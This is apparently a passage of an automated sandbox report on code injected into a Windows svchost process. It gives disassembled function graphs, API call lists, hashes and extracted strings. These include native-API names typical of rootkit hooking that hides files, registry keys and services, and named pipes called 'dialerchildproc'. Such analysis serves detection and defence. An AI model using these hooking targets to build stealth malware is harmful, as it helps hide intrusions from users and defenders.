                                                                          control_flow_graph 365 257e10a2b2c-257e10a2ba5 call 257e10c2ce0 368 257e10a2ee0-257e10a2f03 365->368 369 257e10a2bab-257e10a2bb1 365->369 369->368 370 257e10a2bb7-257e10a2bba 369->370 370->368 371 257e10a2bc0-257e10a2bc3 370->371 371->368 372 257e10a2bc9-257e10a2bd9 GetModuleHandleA 371->372 373 257e10a2bed 372->373 374 257e10a2bdb-257e10a2beb call 257e10b6090 372->374 376 257e10a2bf0-257e10a2c0e 373->376 374->376 376->368 379 257e10a2c14-257e10a2c33 StrCmpNIW 376->379 379->368 380 257e10a2c39-257e10a2c3d 379->380 380->368 381 257e10a2c43-257e10a2c4d 380->381 381->368 382 257e10a2c53-257e10a2c5a 381->382 382->368 383 257e10a2c60-257e10a2c73 382->383 384 257e10a2c75-257e10a2c81 383->384 385 257e10a2c83 383->385 386 257e10a2c86-257e10a2c8a 384->386 385->386 387 257e10a2c9a 386->387 388 257e10a2c8c-257e10a2c98 386->388 389 257e10a2c9d-257e10a2ca7 387->389 388->389 390 257e10a2d9d-257e10a2da1 389->390 391 257e10a2cad-257e10a2cb0 389->391 394 257e10a2ed2-257e10a2eda 390->394 395 257e10a2da7-257e10a2daa 390->395 392 257e10a2cc2-257e10a2ccc 391->392 393 257e10a2cb2-257e10a2cbf call 257e10a199c 391->393 397 257e10a2d00-257e10a2d0a 392->397 398 257e10a2cce-257e10a2cdb 392->398 393->392 394->368 394->383 399 257e10a2dbb-257e10a2dc5 395->399 400 257e10a2dac-257e10a2db8 call 257e10a199c 395->400 406 257e10a2d3a-257e10a2d3d 397->406 407 257e10a2d0c-257e10a2d19 397->407 398->397 405 257e10a2cdd-257e10a2cea 398->405 402 257e10a2df5-257e10a2df8 399->402 403 257e10a2dc7-257e10a2dd4 399->403 400->399 412 257e10a2e05-257e10a2e12 lstrlenW 402->412 413 257e10a2dfa-257e10a2e03 call 257e10a1bbc 402->413 403->402 411 257e10a2dd6-257e10a2de3 403->411 414 257e10a2ced-257e10a2cf3 405->414 409 257e10a2d3f-257e10a2d49 call 257e10a1bbc 406->409 410 257e10a2d4b-257e10a2d58 lstrlenW 406->410 407->406 415 257e10a2d1b-257e10a2d28 407->415 409->410 421 257e10a2d93-257e10a2d98 409->421 417 257e10a2d5a-257e10a2d64 410->417 418 257e10a2d7b-257e10a2d8d call 257e10a3844 410->418 419 257e10a2de6-257e10a2dec 411->419 423 257e10a2e35-257e10a2e3f call 257e10a3844 412->423 424 257e10a2e14-257e10a2e1e 412->424 413->412 429 257e10a2e4a-257e10a2e55 413->429 414->421 422 257e10a2cf9-257e10a2cfe 414->422 425 257e10a2d2b-257e10a2d31 415->425 417->418 428 257e10a2d66-257e10a2d79 call 257e10a152c 417->428 418->421 433 257e10a2e42-257e10a2e44 418->433 419->429 430 257e10a2dee-257e10a2df3 419->430 421->433 422->397 422->414 423->433 424->423 434 257e10a2e20-257e10a2e33 call 257e10a152c 424->434 425->421 435 257e10a2d33-257e10a2d38 425->435 428->418 428->421 437 257e10a2e57-257e10a2e5b 429->437 438 257e10a2ecc-257e10a2ed0 429->438 430->402 430->419 433->394 433->429 434->423 434->429 435->406 435->425 442 257e10a2e63-257e10a2e7d call 257e10a85c0 437->442 443 257e10a2e5d-257e10a2e61 437->443 438->394 446 257e10a2e80-257e10a2e83 442->446 443->442 443->446 449 257e10a2e85-257e10a2ea3 call 257e10a85c0 446->449 450 257e10a2ea6-257e10a2ea9 446->450 449->450 450->438 452 257e10a2eab-257e10a2ec9 call 257e10a85c0 450->452 452->438
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: a05134c9a34ff4c1d66afd38e5ef54d71b3b96099cc726008d15654598d14383
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: 3BB1D032258F5482EB6EDF25EC4B7A963A5F744B86F0450A6EE0953B95DF34CC80C398
                                                                          Function 00000257E10A7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 219ced55679ac893985f66a80f0dbd7178f5651cf27174fbf386b8ec505e6a56
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 29314A72249F808AEB65DF60F8867EE7360F784745F44802ADA4E57B98EF38C648C714
                                                                          Function 00000257E10AD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 3bbfa850ad8dbd0e4a6fa2243018912ee9c80721fc4e2599e2c74e45bb328308
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 1531AD32258F8086EB69CF25FC467AE73A0F789755F504166EA9D43B98EF38C145CB04
                                                                          Function 00000257E10A12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: eced55502f1a75a026b6edf846e6a0891afcc2511a2fde73ec7a25957e053ce4
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 39517C32248F8486EB59CF66F84A75A77A1F389F8AF088524DE5907718DF3CC049C704
                                                                          Function 00000257E10A1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 729b3f40a99a6114c8675349f500bf02ad9969b64215182506dd6b7d13de966c
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 6C319574298F4AE1EA0FEFA5FCABBD46325B75434BF8054A3940902576DF3C8249C768
                                                                          Function 00000257E1076910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 207 257e1076910-257e1076916 208 257e1076918-257e107691b 207->208 209 257e1076951-257e107695b 207->209 210 257e107691d-257e1076920 208->210 211 257e1076945-257e1076984 call 257e1076fc0 208->211 212 257e1076a78-257e1076a8d 209->212 213 257e1076938 __scrt_dllmain_crt_thread_attach 210->213 214 257e1076922-257e1076925 210->214 227 257e107698a-257e107699f call 257e1076e54 211->227 228 257e1076a52 211->228 215 257e1076a9c-257e1076ab6 call 257e1076e54 212->215 216 257e1076a8f 212->216 222 257e107693d-257e1076944 213->222 218 257e1076927-257e1076930 214->218 219 257e1076931-257e1076936 call 257e1076f04 214->219 230 257e1076ab8-257e1076aed call 257e1076f7c call 257e1076e1c call 257e1077318 call 257e1077130 call 257e1077154 call 257e1076fac 215->230 231 257e1076aef-257e1076b20 call 257e1077190 215->231 220 257e1076a91-257e1076a9b 216->220 219->222 239 257e1076a6a-257e1076a77 call 257e1077190 227->239 240 257e10769a5-257e10769b6 call 257e1076ec4 227->240 232 257e1076a54-257e1076a69 228->232 230->220 241 257e1076b22-257e1076b28 231->241 242 257e1076b31-257e1076b37 231->242 239->212 259 257e10769b8-257e10769dc call 257e10772dc call 257e1076e0c call 257e1076e38 call 257e107ac0c 240->259 260 257e1076a07-257e1076a11 call 257e1077130 240->260 241->242 246 257e1076b2a-257e1076b2c 241->246 247 257e1076b7e-257e1076b94 call 257e107268c 242->247 248 257e1076b39-257e1076b43 242->248 253 257e1076c1f-257e1076c2c 246->253 268 257e1076bcc-257e1076bce 247->268 269 257e1076b96-257e1076b98 247->269 254 257e1076b45-257e1076b4d 248->254 255 257e1076b4f-257e1076b5d call 257e1085780 248->255 262 257e1076b63-257e1076b78 call 257e1076910 254->262 255->262 272 257e1076c15-257e1076c1d 255->272 259->260 310 257e10769de-257e10769e5 __scrt_dllmain_after_initialize_c 259->310 260->228 280 257e1076a13-257e1076a1f call 257e1077180 260->280 262->247 262->272 270 257e1076bd5-257e1076bea call 257e1076910 268->270 271 257e1076bd0-257e1076bd3 268->271 269->268 277 257e1076b9a-257e1076bbc call 257e107268c call 257e1076a78 269->277 270->272 289 257e1076bec-257e1076bf6 270->289 271->270 271->272 272->253 277->268 304 257e1076bbe-257e1076bc6 call 257e1085780 277->304 297 257e1076a45-257e1076a50 280->297 298 257e1076a21-257e1076a2b call 257e1077098 280->298 294 257e1076bf8-257e1076bff 289->294 295 257e1076c01-257e1076c11 call 257e1085780 289->295 294->272 295->272 297->232 298->297 309 257e1076a2d-257e1076a3b 298->309 304->268 309->297 310->260 311 257e10769e7-257e1076a04 call 257e107abc8 310->311 311->260
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: c413f792152c6e77bcdec011d4ce604bdbff46f8c7e2d41a41648d6f97dd56db
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 7481476178CF0586F65FBB2ABC4F3B922D0E785782F5480A49A2647797DB38C8458B0C
                                                                          Function 00000257E10ACE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000257E10ACE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEBC
                                                                          • SetLastError.KERNEL32 ref: 00000257E10ACED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000257E10AECCC,?,?,?,?,00000257E10ABF9F,?,?,?,?,?,00000257E10A7AB0), ref: 00000257E10ACF2C
                                                                            • Part of subcall function 00000257E10AD6CC: HeapAlloc.KERNEL32 ref: 00000257E10AD721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF54
                                                                            • Part of subcall function 00000257E10AD744: HeapFree.KERNEL32 ref: 00000257E10AD75A
                                                                            • Part of subcall function 00000257E10AD744: GetLastError.KERNEL32 ref: 00000257E10AD764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: 44b74c0836ad876a2fac46d0e824247e53a8591ac7bd446e8d08f2f1267c89cf
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 3D4182703CDF4441FAAFA7357E5F3AD22815B447B2F6547A4A936066D6DE38C401872C
                                                                          Function 00000257E10A2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: fd144254930c9193e2e316754b6910d439631fa1b8b54bcb3ad30ea55ac0c1ae
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: DB214F32658F4082FB19CB25F84A75A73A0F789BA6F504255EA6903BA8CF3CC149CF04
                                                                          Function 00000257E10AA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 586 257e10aa544-257e10aa5ac call 257e10ab414 589 257e10aa5b2-257e10aa5b5 586->589 590 257e10aaa13-257e10aaa1b call 257e10ac748 586->590 589->590 591 257e10aa5bb-257e10aa5c1 589->591 593 257e10aa690-257e10aa6a2 591->593 594 257e10aa5c7-257e10aa5cb 591->594 596 257e10aa963-257e10aa967 593->596 597 257e10aa6a8-257e10aa6ac 593->597 594->593 598 257e10aa5d1-257e10aa5dc 594->598 601 257e10aa9a0-257e10aa9aa call 257e10a9634 596->601 602 257e10aa969-257e10aa970 596->602 597->596 599 257e10aa6b2-257e10aa6bd 597->599 598->593 600 257e10aa5e2-257e10aa5e7 598->600 599->596 603 257e10aa6c3-257e10aa6ca 599->603 600->593 604 257e10aa5ed-257e10aa5f7 call 257e10a9634 600->604 601->590 615 257e10aa9ac-257e10aa9cb call 257e10a7940 601->615 602->590 605 257e10aa976-257e10aa99b call 257e10aaa1c 602->605 607 257e10aa6d0-257e10aa707 call 257e10a9a10 603->607 608 257e10aa894-257e10aa8a0 603->608 604->615 619 257e10aa5fd-257e10aa628 call 257e10a9634 * 2 call 257e10a9d24 604->619 605->601 607->608 624 257e10aa70d-257e10aa715 607->624 608->601 612 257e10aa8a6-257e10aa8aa 608->612 616 257e10aa8ba-257e10aa8c2 612->616 617 257e10aa8ac-257e10aa8b8 call 257e10a9ce4 612->617 616->601 623 257e10aa8c8-257e10aa8d5 call 257e10a98b4 616->623 617->616 630 257e10aa8db-257e10aa8e3 617->630 655 257e10aa62a-257e10aa62e 619->655 656 257e10aa648-257e10aa652 call 257e10a9634 619->656 623->601 623->630 628 257e10aa719-257e10aa74b 624->628 632 257e10aa751-257e10aa75c 628->632 633 257e10aa887-257e10aa88e 628->633 635 257e10aa9f6-257e10aaa12 call 257e10a9634 * 2 call 257e10ac6a8 630->635 636 257e10aa8e9-257e10aa8ed 630->636 632->633 637 257e10aa762-257e10aa77b 632->637 633->608 633->628 635->590 639 257e10aa8ef-257e10aa8fe call 257e10a9ce4 636->639 640 257e10aa900 636->640 641 257e10aa781-257e10aa7c6 call 257e10a9cf8 * 2 637->641 642 257e10aa874-257e10aa879 637->642 650 257e10aa903-257e10aa90d call 257e10ab4ac 639->650 640->650 667 257e10aa804-257e10aa80a 641->667 668 257e10aa7c8-257e10aa7ee call 257e10a9cf8 call 257e10aac38 641->668 647 257e10aa884 642->647 647->633 650->601 664 257e10aa913-257e10aa961 call 257e10a9944 call 257e10a9b50 650->664 655->656 661 257e10aa630-257e10aa63b 655->661 656->593 671 257e10aa654-257e10aa674 call 257e10a9634 * 2 call 257e10ab4ac 656->671 661->656 663 257e10aa63d-257e10aa642 661->663 663->590 663->656 664->601 675 257e10aa87b 667->675 676 257e10aa80c-257e10aa810 667->676 686 257e10aa7f0-257e10aa802 668->686 687 257e10aa815-257e10aa872 call 257e10aa470 668->687 692 257e10aa676-257e10aa680 call 257e10ab59c 671->692 693 257e10aa68b 671->693 680 257e10aa880 675->680 676->641 680->647 686->667 686->668 687->680 696 257e10aa9f0-257e10aa9f5 call 257e10ac6a8 692->696 697 257e10aa686-257e10aa9ef call 257e10a92ac call 257e10aaff4 call 257e10a94a0 692->697 693->593 696->635 697->696
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: fa66f7741ebcd80bb86e54b7b1d1724f64a0d38ed48e78e569a20c50e363ff0f
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 46E1E572648F40CAEB6ADF65E84B39D77A0F748B99F100155EE8957B95CF34C081C714
                                                                          Function 00000257E1079944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 465 257e1079944-257e10799ac call 257e107a814 468 257e1079e13-257e1079e1b call 257e107bb48 465->468 469 257e10799b2-257e10799b5 465->469 469->468 470 257e10799bb-257e10799c1 469->470 472 257e10799c7-257e10799cb 470->472 473 257e1079a90-257e1079aa2 470->473 472->473 477 257e10799d1-257e10799dc 472->477 475 257e1079aa8-257e1079aac 473->475 476 257e1079d63-257e1079d67 473->476 475->476 480 257e1079ab2-257e1079abd 475->480 478 257e1079d69-257e1079d70 476->478 479 257e1079da0-257e1079daa call 257e1078a34 476->479 477->473 481 257e10799e2-257e10799e7 477->481 478->468 482 257e1079d76-257e1079d9b call 257e1079e1c 478->482 479->468 491 257e1079dac-257e1079dcb call 257e1076d40 479->491 480->476 484 257e1079ac3-257e1079aca 480->484 481->473 485 257e10799ed-257e10799f7 call 257e1078a34 481->485 482->479 488 257e1079c94-257e1079ca0 484->488 489 257e1079ad0-257e1079b07 call 257e1078e10 484->489 485->491 499 257e10799fd-257e1079a28 call 257e1078a34 * 2 call 257e1079124 485->499 488->479 492 257e1079ca6-257e1079caa 488->492 489->488 504 257e1079b0d-257e1079b15 489->504 496 257e1079cac-257e1079cb8 call 257e10790e4 492->496 497 257e1079cba-257e1079cc2 492->497 496->497 513 257e1079cdb-257e1079ce3 496->513 497->479 503 257e1079cc8-257e1079cd5 call 257e1078cb4 497->503 533 257e1079a2a-257e1079a2e 499->533 534 257e1079a48-257e1079a52 call 257e1078a34 499->534 503->479 503->513 505 257e1079b19-257e1079b4b 504->505 510 257e1079c87-257e1079c8e 505->510 511 257e1079b51-257e1079b5c 505->511 510->488 510->505 511->510 514 257e1079b62-257e1079b7b 511->514 515 257e1079ce9-257e1079ced 513->515 516 257e1079df6-257e1079e12 call 257e1078a34 * 2 call 257e107baa8 513->516 518 257e1079c74-257e1079c79 514->518 519 257e1079b81-257e1079bc6 call 257e10790f8 * 2 514->519 520 257e1079d00 515->520 521 257e1079cef-257e1079cfe call 257e10790e4 515->521 516->468 524 257e1079c84 518->524 546 257e1079bc8-257e1079bee call 257e10790f8 call 257e107a038 519->546 547 257e1079c04-257e1079c0a 519->547 529 257e1079d03-257e1079d0d call 257e107a8ac 520->529 521->529 524->510 529->479 544 257e1079d13-257e1079d61 call 257e1078d44 call 257e1078f50 529->544 533->534 538 257e1079a30-257e1079a3b 533->538 534->473 550 257e1079a54-257e1079a74 call 257e1078a34 * 2 call 257e107a8ac 534->550 538->534 543 257e1079a3d-257e1079a42 538->543 543->468 543->534 544->479 566 257e1079c15-257e1079c72 call 257e1079870 546->566 567 257e1079bf0-257e1079c02 546->567 554 257e1079c0c-257e1079c10 547->554 555 257e1079c7b 547->555 571 257e1079a8b 550->571 572 257e1079a76-257e1079a80 call 257e107a99c 550->572 554->519 556 257e1079c80 555->556 556->524 566->556 567->546 567->547 571->473 575 257e1079a86-257e1079def call 257e10786ac call 257e107a3f4 call 257e10788a0 572->575 576 257e1079df0-257e1079df5 call 257e107baa8 572->576 575->576 576->516
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: eee8ddbebd137ff77ed4dfc8451c6d54f91bdde69a51e284d5195fa703101059
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: FFE1E472648F408AEB6AFF65E88B3AD37B0F7457A9F000156EE4A57B55CB34C490C704
                                                                          Function 00000257E10AF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: cf054b1d2baf678fe8bdec6d8eaa147d53923dc8430d7e3ded5bb42e28665e5b
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 2741C632399F0091FA1FDB16BC0B79A2391B745BE1F5942659D1E87784EF3CC4458328
                                                                          Function 00000257E10A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 9cf63d37dc8258112caa738864d3c548755d6f27b2a305309498d83b3183a8b3
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 27419F73218F84C6E765CF21F84A79E77A1F388B89F048129EA8907B58DF38D449CB14
                                                                          Function 00000257E10AD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0CE
